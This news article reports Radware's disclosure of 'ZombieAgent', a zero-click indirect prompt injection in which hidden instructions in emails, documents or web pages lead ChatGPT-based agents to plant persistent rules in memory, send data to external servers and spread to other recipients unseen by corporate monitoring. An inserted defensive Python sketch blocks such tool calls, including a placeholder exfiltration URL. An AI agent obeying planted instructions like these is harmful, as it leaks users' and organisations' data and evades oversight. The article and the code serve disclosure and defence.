‘ZombieAgent’ flaw exposes blind spots in ChatGPT AI
Cybersecurity firm Radware has disclosed a new vulnerability, dubbed “ZombieAgent”, that targets OpenAI’s ChatGPT-based AI agents and allows silent data theft and autonomous spread across organisations without user interaction.
The company said the zero-click indirect prompt injection flaw affects agentic AI workflows that rely on ChatGPT models to read emails, documents and web pages, and to trigger actions in connected systems. The weakness involves hidden instructions embedded in ordinary content that AI agents process as part of routine tasks.
Radware said ZombieAgent directs compromised ChatGPT agents to exfiltrate sensitive customer and corporate data from OpenAI’s infrastructure. The attack runs on the service side in the cloud rather than on user devices or corporate networks.
According to the researchers, this design means existing monitoring and logging tools inside organisations may not register the activity. They said this creates blind spots in environments that depend on AI agents for decision-making and workflow automation.
Persistent hijacking
Radware described ZombieAgent as an evolution of its previously reported ShadowLeak research on indirect prompt injection. ShadowLeak showed how attackers could influence the behaviour of AI agents through crafted content. The new finding adds a persistence layer that affects agents’ long-term operation.
The company said ZombieAgent can implant malicious rules into an AI agent’s long-term memory or working notes. The agent then follows those rules in future interactions without further contact from the attacker.
Once implanted, the rules trigger hidden actions every time the agent runs. The agent can silently collect sensitive information over extended periods. It can also distribute the infection.
Radware said the attack can propagate across additional contacts or email recipients. A single malicious email can therefore act as an initial vector. The firm warned that this behaviour could create a worm-like campaign that spreads through and beyond a single organisation.
“ZombieAgent illustrates a critical structural weakness in today’s agentic AI platforms,” said Pascal Geenens, Vice President, Threat Intelligence, Radware. “Enterprises rely on these agents to make decisions and access sensitive systems, but they lack visibility into how agents interpret untrusted content or what actions they execute in the cloud. This creates a dangerous blind spot that attackers are already exploiting.”
Zero-click attack path
The vulnerability bypasses the guardrails intended to protect ChatGPT agents from prompt injection. Radware’s research team found that attackers can still plant concealed directives inside everyday content.
The firm said adversaries can hide instructions inside emails, documents or web pages. AI agents that summarise inboxes or process documents interpret these as commands. No additional user action is needed after the malicious content enters the system.
Once activated, a compromised agent can collect mailbox data. It can access sensitive files and interact with external servers. All activity takes place as part of the agent’s normal operation.
Radware said no “click” or confirmation from the user is required at any stage. The exploit therefore falls into the zero-click category, which often proves difficult for organisations to mitigate.
Cloud-side invisibility
A key element of ZombieAgent is its focus on cloud infrastructure rather than endpoints. Radware said all malicious activity runs within OpenAI’s environment that hosts the ChatGPT models and agent workflows.
The attacker does not need to compromise user devices. The exploit does not rely on code that runs directly inside corporate networks. As a result, endpoint logs do not record the activity.
Radware said no network traffic from the malicious actions passes through standard corporate security tools. It listed secure web gateways, endpoint detection and response tools and firewalls among the systems that may not see the exfiltration flows.
The firm said this cloud-side execution means no traditional alerts warn security teams or users that data has been accessed or moved. It described ZombieAgent as difficult to detect or block using current enterprise controls.
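The three behaviours the article attributes to ZombieAgent (rules written into the agent’s long-term memory, data sent to external servers, and mail to new recipients) and the visibility gap it describes (nothing on the endpoint or network sees the activity) suggest where a defender-side control would sit: between the model’s proposed tool calls and the real tools, with its own log. The following is an added illustration of that idea, not code from Radware, OpenAI or the article. The class names, tool names, allowlist hosts, the “collector.example.net” placeholder and the whole scenario are assumptions; the gateway looks only at where the triggering content came from, not at what it says.

```python
from dataclasses import dataclass
from urllib.parse import urlparse

# Assumed allowlist of internal hosts the agent may call. Anything else is
# treated as a potential exfiltration channel.
ALLOWED_HOSTS = {"crm.example.internal", "docs.example.internal"}


@dataclass(frozen=True)
class Context:
    """The task the agent is running and the provenance of its input."""
    task_id: str
    source: str                         # e.g. "mailbox", "user_chat"
    untrusted: bool                     # True when the input is third-party content
    thread_recipients: frozenset = frozenset()  # people already on the email thread


@dataclass(frozen=True)
class ToolCall:
    name: str                           # "memory_write", "http_get", "send_email"
    args: dict


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


class ToolGateway:
    """Policy point between the model's proposed tool calls and the real tools (hypothetical)."""

    def __init__(self, allowed_hosts=ALLOWED_HOSTS):
        self.allowed_hosts = set(allowed_hosts)
        self.audit = []           # decisions the organisation can ship to its own SIEM
        self.pending_memory = []  # memory writes parked for human review

    def decide(self, ctx: Context, call: ToolCall) -> Decision:
        if call.name == "memory_write":
            if ctx.untrusted:
                # A rule written while processing untrusted content is the
                # persistence step the article describes; park it instead.
                self.pending_memory.append({"task": ctx.task_id, **call.args})
                d = Decision(False, "memory write from untrusted content held for review")
            else:
                d = Decision(True, "memory write from trusted source")
        elif call.name == "http_get":
            host = urlparse(call.args.get("url", "")).hostname or ""
            if host in self.allowed_hosts:
                d = Decision(True, f"host {host} on allowlist")
            else:
                d = Decision(False, f"host {host!r} not on allowlist (possible exfiltration)")
        elif call.name == "send_email":
            new = set(call.args.get("to", [])) - set(ctx.thread_recipients)
            if ctx.untrusted and new:
                # Mailing people outside the thread from an untrusted task is the
                # spreading behaviour the article warns about.
                d = Decision(False, f"untrusted task tried to mail new recipients {sorted(new)}")
            else:
                d = Decision(True, "recipients limited to existing thread")
        else:
            d = Decision(False, f"unknown tool {call.name!r}")
        # Every decision is recorded on the defender's side, allowed or not, so the
        # organisation has a log that does not depend on endpoint or network sensors.
        self.audit.append({"task": ctx.task_id, "source": ctx.source,
                           "untrusted": ctx.untrusted, "tool": call.name,
                           "allowed": d.allowed, "reason": d.reason})
        return d


def run_demo() -> ToolGateway:
    """Constructed scenario: an inbox-summarising agent proposes three tool calls
    while handling a third-party email, then one call from the user's own chat."""
    gw = ToolGateway()
    inbox_task = Context("task-1", "mailbox", untrusted=True,
                         thread_recipients=frozenset({"alice@example.internal"}))
    proposals = [
        ToolCall("memory_write", {"rule": "<whatever the content asked for>"}),
        ToolCall("http_get", {"url": "https://collector.example.net/q?d=..."}),  # placeholder host
        ToolCall("send_email", {"to": ["alice@example.internal", "bob@partner.example"]}),
    ]
    for p in proposals:
        gw.decide(inbox_task, p)
    user_task = Context("task-2", "user_chat", untrusted=False)
    gw.decide(user_task, ToolCall("memory_write", {"rule": "prefer short summaries"}))
    return gw


if __name__ == "__main__":
    for entry in run_demo().audit:
        print(entry)
```

Running the demo denies all three calls proposed during the untrusted mailbox task (the memory rule is parked for review, the outbound fetch fails the allowlist, the mail to a new recipient is refused) and permits the memory write made from the user’s own chat; all four decisions land in the gateway’s audit list. The point of the design is that provenance, not content inspection, drives the policy, and that the log lives with the organisation rather than only inside the cloud service.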
Expanding threat surface
The research follows earlier work on ShadowLeak, which highlighted risks in what Radware calls the “agentic threat surface”. This surface covers AI agents that read and write emails, interact with corporate applications, start workflows and make autonomous decisions based on content they ingest.
Radware said the new findings show how attackers can take advantage of the rapid rollout of such AI automation. It warned that the same features that make AI agents more useful in business also increase their attractiveness as a target.
The company said it disclosed the ZombieAgent vulnerability to OpenAI under responsible disclosure processes. It plans to publish a full technical analysis with defence guidance.
Radware will outline the research in a dedicated webinar for security leaders and AI developers. The session will examine the attack sequence, potential mitigations for AI agents and directions for future threat research around agentic AI.